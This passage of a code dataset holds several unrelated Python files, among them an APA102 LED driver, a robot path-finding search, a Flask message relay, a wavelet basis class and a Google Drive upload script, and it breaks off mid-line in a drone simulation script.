20, 19, 18, 17, 16,\n 24, 25, 26, 27, 28, 29, 30, 31,\n 39, 38, 37, 36, 35, 34, 33, 32,\n 40, 41, 42, 43, 44, 45, 46, 47,\n 55, 54, 53, 52, 51, 50, 49, 48,\n 56, 57, 58, 59, 60, 61, 62, 63\n]\n\n\nclass apa102(device):\n \"\"\"\n Encapsulates the serial interface to a series of 'next-gen' RGB neopixels\n daisy-chained together with APA102 chips. On creation, the array is\n initialized with the correct number of cascaded devices. Further control\n commands can then be called to affect the brightness and other settings.\n\n Note that the brightness of individual pixels can be set by altering the\n alpha channel of the RGBA image that is being displayed.\n\n :param serial_interface: The serial interface to write to (usually omit this\n parameter and it will default to the correct value - it is only needed\n for testing whereby a mock implementation is supplied)\n :param width: The number of pixels laid out horizontally\n :type width: int\n :param height: The number of pixels laid out vertically\n :type width: int\n :param cascaded: The number of pixels in a single strip - if supplied, this\n will override ``width`` and ``height``.\n :type width: int\n :param rotate: Whether the device dimenstions should be rotated in-situ:\n A value of: 0=0°, 1=90°, 2=180°, 3=270°. If not supplied, zero is\n assumed.\n :type rotate: int\n :param mapping: An (optional) array of integer values that translate the\n pixel to physical offsets. If supplied, should be the same size as\n ``width * height``\n :type mapping: int[]\n\n .. versionadded:: 0.9.0\n \"\"\"\n def __init__(self, serial_interface=None, width=8, height=1, cascaded=None,\n rotate=0, mapping=None, **kwargs):\n super(apa102, self).__init__(luma.core.const.common, serial_interface or self.__bitbang__())\n\n # Derive (override) the width and height if a cascaded param supplied\n if cascaded is not None:\n width = cascaded\n height = 1\n\n self.cascaded = width * height\n self.capabilities(width, height, rotate, mode=\"RGBA\")\n self._mapping = list(mapping or range(self.cascaded))\n assert(self.cascaded == len(self._mapping))\n self._last_image = None\n\n self.contrast(0x70)\n self.clear()\n self.show()\n\n def __bitbang__(self):\n from luma.core.interface.serial import bitbang\n return bitbang(SCLK=24, SDA=23)\n\n def display(self, image):\n \"\"\"\n Takes a 32-bit RGBA :py:mod:`PIL.Image` and dumps it to the daisy-chained\n APA102 neopixels. If a pixel is not fully opaque, the alpha channel\n value is used to set the brightness of the respective RGB LED.\n \"\"\"\n assert(image.mode == self.mode)\n assert(image.size == self.size)\n self._last_image = image.copy()\n\n # Send zeros to reset, then pixel values then zeros at end\n sz = image.width * image.height * 4\n buf = bytearray(sz * 3)\n\n m = self._mapping\n for idx, (r, g, b, a) in enumerate(image.getdata()):\n offset = sz + m[idx] * 4\n brightness = (a >> 4) if a != 0xFF else self._brightness\n buf[offset] = (0xE0 | brightness)\n buf[offset + 1] = b\n buf[offset + 2] = g\n buf[offset + 3] = r\n\n self._serial_interface.data(list(buf))\n\n def show(self):\n \"\"\"\n Not supported\n \"\"\"\n pass\n\n def hide(self):\n \"\"\"\n Not supported\n \"\"\"\n pass\n\n def contrast(self, value):\n \"\"\"\n Sets the LED intensity to the desired level, in the range 0-255.\n\n :param level: Desired contrast level in the range of 0-255.\n :type level: int\n \"\"\"\n assert(0 <= value <= 255)\n self._brightness = value >> 4\n if self._last_image is not None:\n self.display(self._last_image)\n","sub_path":"luma/led_matrix/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":13621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"300007964","text":"from classes.ldapfilter import LdapFilter\n\n\nclass LdapPersonHints(object):\n def __init__(self):\n self.hints = {}\n return\n\n def add(self,hints):\n self.hints.update(hints)\n return\n\n def filters(self):\n f_list = []\n for hint in self.hints:\n f = LdapFilter()\n f.add(hint,self.hints[hint])\n f_list.append(f)\n return f_list\n\n def filter_strings(self):\n f_strings = []\n f_list = self.filters()\n for f in f_list:\n f_str = str(f)\n f_strings.append(f_str)\n return f_strings\n","sub_path":"classes/ldappersonhints.py","file_name":"ldappersonhints.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"647840492","text":"\nimport FWCore.ParameterSet.Config as cms\n\n# customize to use upgrade L1 emulation \n\nfrom L1Trigger.Configuration.L1Trigger_custom import customiseL1Menu\n\n# customization of run L1 emulator for 2015 run configuration\ndef customiseSimL1EmulatorForPostLS1(process):\n #print \"INFO: Customising L1T emulator for 2015 run configuration\"\n #print \"INFO: Customize the L1 menu\"\n # the following line will break HLT if HLT menu is not updated with the corresponding menu\n process=customiseL1Menu(process)\n #print \"INFO: loading RCT LUTs\"\n process.load(\"L1Trigger.L1TCalorimeter.caloStage1RCTLuts_cff\")\n if hasattr(process,'L1simulation_step'):\n #print \"INFO: Removing GCT from simulation and adding new Stage 1\"\n process.load('L1Trigger.L1TCalorimeter.caloStage1Params_cfi')\n process.load('L1Trigger.L1TCalorimeter.L1TCaloStage1_cff')\n process.L1simulation_step.replace(process.simGctDigis,process.L1TCaloStage1)\n process.rctUpgradeFormatDigis.regionTag = cms.InputTag(\"simRctDigis\")\n process.rctUpgradeFormatDigis.emTag = cms.InputTag(\"simRctDigis\")\n #print \"New L1 simulation step is:\", process.L1simulation_step\n process.simGtDigis.GmtInputTag = 'simGmtDigis'\n process.simGtDigis.GctInputTag = 'caloStage1LegacyFormatDigis'\n process.simGtDigis.TechnicalTriggersInputTags = cms.VInputTag( )\n process.gctDigiToRaw.gctInputLabel = 'caloStage1LegacyFormatDigis'\n return process\n\n# #\n# # Plan B: (Not Needed if packing/unpacking of Stage 1 calo via legacy formats and GCT packer works)\n# #\n# process.digi2raw_step.remove(process.gctDigiToRaw)\n# \n# # Carry forward legacy format digis for now (keep rest of workflow working)\n# alist=['RAWSIM','RAWDEBUG','FEVTDEBUG','FEVTDEBUGHLT','GENRAW','RAWSIMHLT','FEVT']\n# for a in alist:\n# b=a+'output'\n# if hasattr(process,b):\n# getattr(process,b).outputCommands.append('keep *_caloStage1LegacyFormatDigis_*_*')\n# print \"INFO: keeping L1T legacy format digis in event.\"\n# \n# blist=['l1extraParticles','recoL1ExtraParticles','hltL1ExtraParticles','dqmL1ExtraParticles']\n# for b in blist:\n# if hasattr(process,b):\n# print \"INFO: customizing \", b, \"to use simulated legacy formats, without packing/unpacking\"\n# getattr(process, b).etTotalSource = cms.InputTag(\"caloStage1LegacyFormatDigis\")\n# getattr(process, b).nonIsolatedEmSource = cms.InputTag(\"caloStage1LegacyFormatDigis\",\"nonIsoEm\")\n# getattr(process, b).etMissSource = cms.InputTag(\"caloStage1LegacyFormatDigis\")\n# getattr(process, b).htMissSource = cms.InputTag(\"caloStage1LegacyFormatDigis\")\n# getattr(process, b).forwardJetSource = cms.InputTag(\"caloStage1LegacyFormatDigis\",\"forJets\")\n# getattr(process, b).centralJetSource = cms.InputTag(\"caloStage1LegacyFormatDigis\",\"cenJets\")\n# getattr(process, b).tauJetSource = cms.InputTag(\"caloStage1LegacyFormatDigis\",\"tauJets\")\n# getattr(process, b).isolatedEmSource = cms.InputTag(\"caloStage1LegacyFormatDigis\",\"isoEm\")\n# getattr(process, b).etHadSource = cms.InputTag(\"caloStage1LegacyFormatDigis\")\n# getattr(process, b).hfRingEtSumsSource = cms.InputTag(\"caloStage1LegacyFormatDigis\")\n# getattr(process, b).hfRingBitCountsSource = cms.InputTag(\"caloStage1LegacyFormatDigis\")\n#\n# # automatic replacements of \"simGctDigis\" instead of \"hltGctDigis\"\n# for module in process.__dict__.itervalues():\n# if isinstance(module, cms._Module):\n# for parameter in module.__dict__.itervalues():\n# if isinstance(parameter, cms.InputTag):\n# if parameter.moduleLabel == 'hltGctDigis':\n# parameter.moduleLabel = \"simGctDigis\"\n\n","sub_path":"L1Trigger/L1TCommon/python/customsPostLS1.py","file_name":"customsPostLS1.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"167344330","text":"import os\nimport re\nfrom copy import deepcopy\nfrom pprint import *\nfrom src import ADT\n\n\nclass World:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n self.grid = [[0 for x in range(height)] for y in range(width)]\n\n def make_walls(self, mylist):\n \"\"\" This function takes a list or coordinates (mylist) and uses them to add walls to self.grid\n Walls are stored as 1, whereas open space is stored as 0\n \"\"\"\n for coord in mylist:\n x = int(coord[0])\n y = int(coord[1])\n self.grid[x][y] = 1\n\n def unmake_walls(self, mylist):\n \"\"\" This function takes a list or coordinates (mylist) and uses them to remove walls from self.grid\n Walls are stored as 1, whereas open space is stored as 0\n \"\"\"\n for coord in mylist:\n x = int(coord[0])\n y = int(coord[1])\n self.grid[x][y] = 0\n\n def is_feasible(self, x, y):\n \"\"\" This function checks that the coordinates x and y refer to a\n coordinate within the grid that is passable (0)\n \"\"\"\n if not (x >= 0 and x < self.width):\n return False\n if not (y >= 0 and y < self.height):\n return False\n return self.grid[x][y] == 0\n\n\nclass Robot:\n def __init__(self, location, goal):\n self.__location = location\n self.__goal = goal\n self.goal_reached = False\n self.path_list = []\n self.smallest = None\n self.smallest_length = None\n\n\n def get_location(self):\n \"\"\" Returns the location of the robot\n \"\"\"\n return self.__location\n\n\n def find_path(self, world, current_path, location):\n \"\"\" This program recursively searches for self.goal\n detailed explanation can be found in the report.\n \"\"\"\n\n # checks that this path isn't longer than the shortest path\n if self.smallest != None:\n if current_path.size >= self.smallest.size:\n return False\n\n # checks that this location is feasible\n if not world.is_feasible(location[0], location[1]):\n return False\n\n # checks whether this location is the goal\n # if it is, information is stored in self.smallest and self.path_length\n if location == self.__goal:\n path_copy = deepcopy(current_path)\n self.smallest = path_copy\n self.path_length = path_copy.size\n print(\"Current smallest:\", self.smallest.size)\n return False\n\n\n east = [location[0], location[1] + 1]\n west = [location[0], location[1] - 1]\n north = [location[0] + 1, location[1]]\n south = [location[0] - 1, location[1]]\n\n # push location to stack, mark location impassable\n current_path.push(location)\n world.make_walls([[location[0], location[1]]])\n\n # call function recursively in all directions\n self.find_path(world, current_path, north)\n self.find_path(world, current_path, south)\n self.find_path(world, current_path, east)\n self.find_path(world, current_path, west)\n\n # pop location from stack, mark location as passable\n current_path.pop()\n world.unmake_walls([location])\n return False\n\n\ndef parse_file(fname):\n \"\"\" This function uses regex to parse the input file for variables to be used in the program\n \"\"\"\n\n # open file\n if os.path.exists(fname):\n buffer = open(fname).read().split(\"\\n\")\n else:\n return \"Error! File does not exist\"\n\n # initialise variables\n height, width = buffer[0].split(\"x\")\n walls = []\n robot_location = None\n goal = None\n\n for i in range(1, len(buffer) -1):\n\n # check for wall coordinates\n wall_pattern = re.compile(\"\\s*w\\s*(-{0,1}\\d+)\\s*,*\\s*(-{0,1}\\d+)\\s*\")\n if wall_pattern.match(buffer[i]):\n wall_contents = wall_pattern.match(buffer[i]).groups()\n walls.append([int(wall_contents[0]), int(wall_contents[1])])\n\n # check for robot coordinates\n robot_pattern = re.compile(\"\\s*r2d2\\s*(-{0,1}\\d+)\\s*,*\\s*(-{0,1}\\d+)\\s*\")\n if robot_pattern.match(buffer[i]):\n robot_contents = robot_pattern.match(buffer[i]).groups()\n robot_location = [int(robot_contents[0]), int(robot_contents[1])]\n\n # check for goal coordinates\n goal_pattern = re.compile(\"\\s*goal\\s*(-{0,1}\\d+)\\s*,*\\s*(-{0,1}\\d+)\\s*\")\n if goal_pattern.match(buffer[i]):\n goal_contents = goal_pattern.match(buffer[i]).groups()\n goal = [int(goal_contents[0]), int(goal_contents[1])]\n\n return int(height), int(width), walls, robot_location, goal\n\n\ndef main():\n \"\"\" Main function for the program\n \"\"\"\n # parse input file, assign contents to variables\n height, width, walls, robot_location, goal = parse_file(\"world1.txt\")\n\n # initialise world object\n world = World(8, 8)\n world.make_walls(walls)\n\n # initialise robot object\n robot = Robot(robot_location, [5, 5])\n start_path = ADT.LinkedStack()\n start_path.push(robot_location)\n\n # print world & robot info\n print(\"robot_location:\", robot_location)\n print(\"Goal:\", goal)\n pprint(world.grid)\n\n # find shortest path\n robot.find_path(world, start_path, robot.get_location())\n if robot.smallest:\n print(\"Smallest path: \", robot.smallest.print_stack())\n else:\n print(\"No path found\")\n\n\nif __name__==\"__main__\":\n main()\n\n\n","sub_path":"shortest_robot.py","file_name":"shortest_robot.py","file_ext":"py","file_size_in_byte":5521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"78779837","text":"try:\r\n from flask import Flask\r\nexcept ImportError:\r\n print(\"install flask to continue\")\r\n exit()\r\nimport time\r\nimport socket \r\n \r\ndef get_ip_address():\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n s.connect((\"8.8.8.8\", 80))\r\n return s.getsockname()[0] \r\n \r\napp = Flask(__name__)\r\nglobal data1\r\ndata1=\"\"\r\n\r\n@app.route('/send/')\r\ndef send(data):\r\n global data1\r\n data1=data\r\n data1=time.asctime( time.localtime(time.time()) )+\":\"+data1\r\n print(data1)\r\n return \"Hello World\"\r\n\r\n@app.route('/recive')\r\ndef recive():\r\n global data1\r\n print(data1)\r\n return \"\"+data1\r\n\r\nif __name__ == '__main__':\r\n app.run(host=get_ip_address())","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"235627755","text":"import numpy as np\nimport scipy.interpolate\nimport scipy.misc\nimport matplotlib.pyplot as plt\nfrom wavelet import Wavelet \nfrom primal_mra import Primal_MRA\nfrom scipy.linalg import block_diag \nfrom dual_mra import Dual_MRA \nimport examples\nfrom helper_functions import plot_matrix\n\n\n\nclass Wavelet_Basis:\n\t\"\"\"\n\tThe Wavelet_Basis class implements the wavelet basis\n\tarising from using a primal and dual MRA \n\trespresented by the objects Primal_MRA and Dual_MRA\n\trespectively. All interaction that is required for solving \n\ta PDE using wavelets can be done by using this class. \n\n\t\"\"\" \n\tdef __init__(self, primal_mra, dual_mra, j, homogeneous = True, Neumann = False):\n\t\tself.primal = primal_mra\n\t\tself.dual = dual_mra\n\t\tself.detail_level = j \n\t\tself.homogeneous = homogeneous\n\t\tself.neumann = Neumann \n\t\tself.initial_completion()\n\t\tself.assemble_basis()\n\n\n\tdef plot(self):\n\n\t\tx = np.linspace(0,1.5,1000) \n\t\tfor ii in range(len(self.basis)):\n\t\t\tplt.plot(x, self.get_function(ii).eval(x), 'b-')\n\t\tplt.show() \n\n\n\tdef add_basis(self, basis):\n\n\t\tself.basis += basis.basis \n\tdef assemble_basis(self):\n\t\tself.basis = []\n\t\tnum_functions = np.shape(self.M_1)[1]\n\n\t\tif self.neumann:\n\t\t\tfor ii in range(2,num_functions-2):\n\t\t\t\tmask = np.transpose(self.M_1[:,ii]) \n\t\t\t\tself.basis.append(Wavelet(self.detail_level, self.primal.degree, mask))\n\n\t\t# elif self.homogeneous:\n\t\t# \tfor ii in range(1,num_functions-1):\n\t\t# \t\tmask = np.transpose(self.M_1[:,ii]) \n\t\t# \t\tself.basis.append(Wavelet(self.detail_level, self.primal.degree, mask))\n\t\n\t\telse:\n\t\t\tfor ii in range(num_functions):\n\t\t\t\tmask = np.transpose(self.M_1[:,ii]) \n\t\t\t\tself.basis.append(Wavelet(self.detail_level, self.primal.degree, mask))\n\n\n\tdef get_function(self, i):\n\t\treturn self.basis[i] \n\n\n\tdef initial_completion(self, return_refinement_matrix = False):\n\t\t\"\"\"This function computes the refinement matrices\n\t\tfor the biorthogonal wavelet system.\n \n Args:\n None\n Returns:\n None \n \"\"\"\n\n\n\t\td = self.primal.degree\n\t\td_t = self.dual.dual_degree \n\n\t\tself.primal.refinement_matrix(self.detail_level)\n\t\tself.dual.refinement_matrix(self.detail_level)\n\n\n\t\tif self.homogeneous:\n\t\t\tM_L = self.primal.M_L[:2*(d-1),:d-1]\n\t\t\tM_R = np.matmul(np.eye(np.shape(M_L)[0])[::-1], np.matmul(M_L, np.eye(np.shape(M_L)[1])[::-1]))\n\t\telse:\n\t\t\tM_L = self.primal.M_L[:2*(d-1),:d-1]\n\t\t\tM_R = np.matmul(np.eye(np.shape(M_L)[0])[::-1], np.matmul(M_L, np.eye(np.shape(M_L)[1])[::-1]))\n\t\tj = self.detail_level \n\n\t\t# Construct matrix A\n\t\tm_A = 2**(j+1) -d + 1 \n\t\tn_A = 2**(j) - d + 1 \n\t\tA = np.zeros((m_A,n_A))\n\n\t\tl_1 = self.primal.l_1 \n\t\tfor i in range(m_A):\n\t\t\tfor k in range(n_A):\n\t\t\t\tif (-1 <= i+1 - 2*(k+1)<= d-1): \n\t\t\t\t\tr = l_1 + 1 + i+1 -2*(k+1)\n\t\t\t\t\ta = 2**(1-d)* scipy.special.binom(d, r + int(np.floor(d/2.)))\n\t\t\t\t\tA[i,k] = a\n\n\t\tl_1 = self.primal.l_1 \n\t\tl_2 = int(np.ceil(d/2.))\n\t\tH_t = np.eye(2**(j+1) - d + 1)\n\n\n\t\t### Factorise matrix A ### \n\n\t\t# Use upper bool to alternate between the two \n\t\t# matrices H\n\n\t\tupper = True \n\t\tii = 1 \n\t\tfor kk in range(1,d+1):\n\t\t\t\n\t\t\tif upper:\n\t\t\t\tn = 1 - ii%2\n\t\t\t\tN = abs(d % 2 - ii %2)\n\t\t\t\tm = (2**(j+1) - d + 1 - n -N)/2\n\t\t\t\tm = int(m) \n\t\t\t\tidx = 2*ii -1 \n\t\t\t\tel1 = A[int(idx/2.),0]\n\t\t\t\tel2 = A[int(idx/2.)+1,0]\n\t\t\t\tU = np.array([[1, - el1/el2],[0,1]])\n\t\t\t\tH = np.eye(2**(j+1) - d + 1)\n\t\t\t\tfor jj in range(0,m):\n\t\t\t\t\tH[n+2*jj:n+2*(jj+1), n+2*jj:n+2*(jj+1)] = U\n\t\t\t\t\n\t\t\tif not upper: \n\t\t\t\tn = 1 - ii % 2\n\t\t\t\tN = abs(d % 2 - ii %2)\n\t\t\t\tm = (2**(j+1) - d + 1 - n -N)/2\n\t\t\t\tm = int(m) \n\t\t\t\tidx = 2*ii \n\t\t\t\tel1 = A[l_2-l_1+1- int(np.floor(idx/2.)),0]\n\t\t\t\tel2 = A[l_2-l_1+1- int(np.floor(idx/2.))-1,0]\n\t\t\t\tL = np.array([[1, 0],[- el1/el2,1]])\n\t\t\t\tH = np.eye(2**(j+1) - d + 1)\n\t\t\t\tfor jj in range(0,m):\n\t\t\t\t\tH[N+2*jj:N+2*(jj+1), N+2*jj:N+2*(jj+1)] = L\n\t\t\t\tii += 1 \n\n\n\t\t\tupper = not upper\n\n\t\t\tA = np.matmul(H,A)\n\t\t\tH_t = np.matmul(H, H_t)\n\t\t\n\t\tH_hat = block_diag(np.eye(d-1), H_t, np.eye(d-1))\n\n\n\t\t### Create matrix F ###\n\n\t\tF = np.zeros((2**(j+1) -d + 1, 2**j -d + 1))\n\t\toffset = int(np.ceil(d/2.)) -1 \n\t\tmemory = offset\n\t\tfor jj in range(np.shape(F)[1]):\n\t\t\tF[memory, jj] = 1.0\n\n\t\t\tmemory += 2\n\t\tF_hat = np.zeros((2**(j+1)+d-1, 2**j))\n\t\tF_hat[d-1:d-1 + np.shape(F)[0], int(np.ceil(d/2.)) -1:int(np.ceil(d/2.)) -1 + np.shape(F)[1]] = F \n\t\tF_hat[d-1:d-1 + int(np.ceil(d/2.)) -1, 0:int(np.ceil(d/2.)) -1] = np.eye(int(np.ceil(d/2.)) -1)\n\t\tm = d-1 + np.shape(F)[0] - int(np.floor(d/2.))\n\t\tn = int(np.ceil(d/2.)) -1 +np.shape(F)[1]\n\t\tF_hat[m:m+int(np.floor(d/2.)), n:n+int(np.floor(d/2.))] = np.eye(int(np.floor(d/2.))) \n\t\t# F_hat[-int(d/2.)-d+2:-d+2,-int(d/2.):-1] = np.eye(int(d/2.))\n\t\t### Construct matrix P ###\n\n\t\tP = np.eye(2**(j+1)+d-1)\n\t\tm = np.shape(M_L)[0]\n\t\tn = np.shape(M_L)[1]\n\t\tP[0:m, 0:n] = M_L\n\t\tP[-m:, -n:] = M_R \n\t\t\n\n\t\t### Initial completion ### \n\n\t\t\n\t\tif self.dual.homogeneous:\n\t\t\tM_hat_0 = self.dual.M\n\t\t\t# M_hat_0[:,[0,-1]] = 0.0\n\t\t\t# M_hat_0[[0,-1],:] = 0.0\n\t\t\tM_0 = self.primal.M\n\n\t\t\n\t\t\t# M_0[:, [0,-1]] = 0.0\n\t\t\tM_0[[0,-1],:] = 0.0\n\t\telse: \n\t\t\tM_hat_0 = self.dual.M\n\t\t\tM_0 = self.primal.M\n\n\t\tif self.homogeneous:\n\t\t\tM_0[[0,-1],:] = 0.0\n\t\t\tM_0[:, [0,-1]] = 0.0\n\n\t\tM_hat_1 = 2**(-0.5) * np.matmul(P, np.matmul(np.linalg.inv(H_hat), F_hat))\n\t\t\n\t\tG_j1 = 2**0.5 * np.matmul(np.transpose(F_hat), np.matmul(H_hat, np.linalg.inv(P)))\n\t\tself.M_1 = np.matmul((np.eye(2**(j+1)+d -1) - np.matmul(M_0, np.transpose(M_hat_0))), M_hat_1)\n\t\tself.M_t_1 = np.transpose(G_j1)\n\n\t\n\t\t# plot_matrix(np.matmul(np.transpose(self.M_1), self.M_t_1))\n\t\tassert (np.linalg.norm(np.matmul(np.transpose(M_0), M_hat_0)[1:-1,1:-1] - np.eye(np.shape(M_0)[1] -2),2) < 1e-6)\n\t\tassert (np.linalg.norm(np.matmul(np.transpose(self.M_1), self.M_t_1)[1:-1, 1:-1] - np.eye(np.shape(self.M_t_1)[1] -2),2) < 1e-6)\n\n\t\tif return_refinement_matrix:\n\n\t\t\treturn M_0 \n\t\tG = np.matmul(np.transpose(M_0), M_hat_0)\n\t\t# G[abs(G) < 1e-5] = 0.0 \n\t\t# plot_matrix(G)\n\t\t# plot_matrix(np.matmul(np.transpose(M_0)[1:-1,1:-1], self.M_t_1[1:-1, :]))\n\t\t# assert (np.linalg.norm(np.matmul(np.transpose(M_0), self.M_t_1)) <1e-12)\n\t\t# assert (np.linalg.norm(np.matmul(np.transpose(M_hat_0), self.M_1)) <1e-12)\n\n\n\n\tdef refinement_matrices(self, j):\n\t\tself.detail_level = j\n\t\tM_0 = self.initial_completion(return_refinement_matrix = True)\n\t\t\n\t\treturn M_0, self.M_1\n\n\tdef grammian(self, j, primal = True):\n\n\t\tif primal:\n\t\t\tgrammian_primal = self.primal.grammian(j+1)\n\t\t\tM = self.M_1\n\t\t\tgrammian = np.matmul(np.transpose(M), np.matmul(grammian_primal, M))\n\t\t\treturn grammian \n\t\telse:\n\t\t\traise NotImplementedError \n\t\t\n\nif __name__ == \"__main__\":\n\n\td = 4\n\td_t = 6\n\tprimal = Primal_MRA(d, d_t) \n\t# primal.refinement_matrix(4)\n\tdual = Dual_MRA(primal, d_t, homogeneous = False)\n\twavelet_basis = Wavelet_Basis(primal, dual, 5, homogeneous = False)\n\tprint(len(wavelet_basis.basis))\n\tM_t = dual.M\n\tM = primal.M\n\t# wavelet_basis.plot()\n\t# G = np.matmul(np.transpose(M_t), M) \n\t# G[abs(G) < 1e-5] = 0.0\n\t# M_t[abs(M_t) < 1e-5] = 0.0\n\timport matplotlib.pyplot as plt \n\tfrom matplotlib import rc\n\t# rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n\t# ## for Palatino and other serif fonts use:\n\t# #rc('font',**{'family':'serif','serif':['Palatino']})\n\t# rc('text', usetex=True)\n\tcolor = np.array([0, 0, 256.])/256.\n\tcolor = (color[0], color[1], color[2])\n\n\tplt.subplot(121)\n\tplt.spy(M, markersize=4, marker = 'o', color =color )\n\t# plt.title(r'M_{4,0}')\n\tplt.subplot(122)\n\tplt.spy(M_t,markersize=4, marker = 'o', color =color)\n\t# plt.title(r'\\tilde{M}_{4,0}')\n\t# plt.subplot(212)\n\t# plt.spy(G,markersize=5, marker = 'o', color ='0.4')\n\tplt.show() \n\t# import tikzplotlib\n\n\t# tikzplotlib.save(\"sparsity_pattern.tex\")\n\n\n\n\t\n\n\n\n\n","sub_path":"src/wavelet_basis.py","file_name":"wavelet_basis.py","file_ext":"py","file_size_in_byte":7581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"386845435","text":"import argparse\nimport json\nimport os\n\nfrom core_data_modules.logging import Logger\nfrom storage.google_cloud import google_cloud_utils\nfrom storage.google_drive import drive_client_wrapper\n\nfrom src.lib import PipelineConfiguration\n\nLogger.set_project_name(\"IMAQAL\")\nlog = Logger(__name__)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Uploads output files\")\n\n parser.add_argument(\"user\", help=\"User launching this program\")\n parser.add_argument(\"google_cloud_credentials_file_path\", metavar=\"google-cloud-credentials-file-path\",\n help=\"Path to a Google Cloud service account credentials file to use to access the \"\n \"credentials bucket\")\n parser.add_argument(\"pipeline_configuration_file_path\", metavar=\"pipeline-configuration-file-path\",\n help=\"Path to the pipeline configuration json file\")\n parser.add_argument(\"run_id\", metavar=\"run-id\",\n help=\"Identifier of this pipeline run\")\n parser.add_argument(\"production_csv_input_path\", metavar=\"production-csv-input-path\",\n help=\"Path to a CSV file with raw message and demographic response, for use in \"\n \"radio show production\"),\n parser.add_argument(\"messages_csv_input_path\", metavar=\"messages-csv-input-path\",\n help=\"Path to analysis dataset CSV where messages are the unit for analysis (i.e. one message \"\n \"per row)\"),\n parser.add_argument(\"individuals_csv_input_path\", metavar=\"individuals-csv-input-path\",\n help=\"Path to analysis dataset CSV where respondents are the unit for analysis (i.e. one \"\n \"respondent per row, with all their messages joined into a single cell)\"),\n parser.add_argument(\"memory_profile_file_path\", metavar=\"memory-profile-file-path\",\n help=\"Path to the memory profile log file to upload\")\n parser.add_argument(\"data_archive_file_path\", metavar=\"data-archive-file-path\",\n help=\"Path to the data archive file to upload\")\n parser.add_argument(\"pipeline_run_mode\", help=\"whether to generate analysis files or not\", choices=[\"all-stages\", \"auto-code-only\"])\n\n args = parser.parse_args()\n\n user = args.user\n google_cloud_credentials_file_path = args.google_cloud_credentials_file_path\n pipeline_configuration_file_path = args.pipeline_configuration_file_path\n run_id = args.run_id\n production_csv_input_path = args.production_csv_input_path\n messages_csv_input_path = args.messages_csv_input_path\n individuals_csv_input_path = args.individuals_csv_input_path\n memory_profile_file_path = args.memory_profile_file_path\n data_archive_file_path = args.data_archive_file_path\n pipeline_run_mode = args.pipeline_run_mode\n\n log.info(\"Loading Pipeline Configuration File...\")\n with open(pipeline_configuration_file_path) as f:\n pipeline_configuration = PipelineConfiguration.from_configuration_file(f)\n\n log.info(f\"Downloading Google Drive service account credentials...\")\n credentials_info = json.loads(google_cloud_utils.download_blob_to_string(\n google_cloud_credentials_file_path, pipeline_configuration.drive_upload.drive_credentials_file_url))\n drive_client_wrapper.init_client_from_info(credentials_info)\n\n log.info(\"Uploading production file to Google Drive...\")\n production_csv_drive_dir = os.path.dirname(pipeline_configuration.drive_upload.production_upload_path)\n production_csv_drive_file_name = os.path.basename(pipeline_configuration.drive_upload.production_upload_path)\n drive_client_wrapper.update_or_create(production_csv_input_path, production_csv_drive_dir,\n target_file_name=production_csv_drive_file_name,\n target_folder_is_shared_with_me=True)\n\n if pipeline_run_mode == \"all-stages\":\n log.info(\"Uploading Analysis CSVs to Google Drive...\")\n\n messages_csv_drive_dir = os.path.dirname(pipeline_configuration.drive_upload.messages_upload_path)\n messages_csv_drive_file_name = os.path.basename(pipeline_configuration.drive_upload.messages_upload_path)\n drive_client_wrapper.update_or_create(messages_csv_input_path, messages_csv_drive_dir,\n target_file_name=messages_csv_drive_file_name,\n target_folder_is_shared_with_me=True)\n\n individuals_csv_drive_dir = os.path.dirname(pipeline_configuration.drive_upload.individuals_upload_path)\n individuals_csv_drive_file_name = os.path.basename(pipeline_configuration.drive_upload.individuals_upload_path)\n drive_client_wrapper.update_or_create(individuals_csv_input_path, individuals_csv_drive_dir,\n target_file_name=individuals_csv_drive_file_name,\n target_folder_is_shared_with_me=True)\n\n memory_profile_upload_location = f\"{pipeline_configuration.memory_profile_upload_url_prefix}{run_id}.profile\"\n log.info(f\"Uploading the memory profile from {memory_profile_file_path} to \"\n f\"{memory_profile_upload_location}...\")\n with open(memory_profile_file_path, \"rb\") as f:\n google_cloud_utils.upload_file_to_blob(\n google_cloud_credentials_file_path, memory_profile_upload_location, f\n )\n\n data_archive_upload_location = f\"{pipeline_configuration.data_archive_upload_url_prefix}{run_id}.tar.gzip\"\n log.info(f\"Uploading the data archive from {data_archive_file_path} to \"\n f\"{data_archive_upload_location}...\")\n with open(data_archive_file_path, \"rb\") as f:\n google_cloud_utils.upload_file_to_blob(\n google_cloud_credentials_file_path, data_archive_upload_location, f\n )\n","sub_path":"upload_files.py","file_name":"upload_files.py","file_ext":"py","file_size_in_byte":5934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"346253342","text":"#!/usr/bin/env python\n\nimport rospy\n\nimport sys, select, termios, tty\nimport airsim\nimport math\nimport random\n\n\"\"\"\nIn settings.json:\n \"Drone2\": {\n \"VehicleType\": \"SimpleFlight\",\n \"DefaultVehicleState\": \"Inactive\",\n \"X\": 8, \"Y\": 0, \"Z\": -2\n }\n\"\"\"\n\ndef drone_chase():\n\n rospy.init_node('chase')\n # rate = rospy.Rate(10) # 10hz\n\n # Setup drone\n client = airsim.MultirotorClient()\n client.confirmConnection()\n client.enableApiControl(True, \"Drone1\")\n client.enableApiControl(True, \"Drone2\")\n client.armDisarm(True, \"Drone1\")\n client.armDisarm(True, \"Drone2\")\n\n airsim.wait_key('Press any key to takeoff')\n f1 = client.takeoffAsync(vehicle_name=\"Drone1\")\n f2 = client.takeoffAsync(vehicle_name=\"Drone2\")\n f1.join()\n f2.join()\n\n x1 = -1 * random.randint(2, 7)\n y1 = random.randint(-3, 4)\n z1 = random.randint(-7, -4)\n x2 = 